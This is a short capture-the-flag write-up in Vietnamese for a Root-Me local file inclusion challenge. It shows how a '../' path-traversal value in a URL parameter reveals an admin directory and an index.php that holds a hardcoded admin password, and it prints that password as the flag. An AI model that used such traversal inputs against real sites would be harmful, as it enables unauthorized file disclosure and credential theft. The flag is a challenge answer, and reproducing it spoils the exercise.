# Local File Inclusion

Thử cho ?file=../

Ta thấy một danh sách các file, có admin, bấm vào chẳng ra cái gì

Nhưng URL nó như thế này `http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=admin`

Ta sửa lại URL : `http://challenge01.root-me.org/web-serveur/ch16/?files=../admin`

Giờ thì thấy có 1 file index.php, có đoạn sau :

```php
$realm = 'PHP Restricted area';
$users = array('admin' => 'OpbNJ60xYpvAQU8');
```



---

### Flag:

`OpbNJ60xYpvAQU8`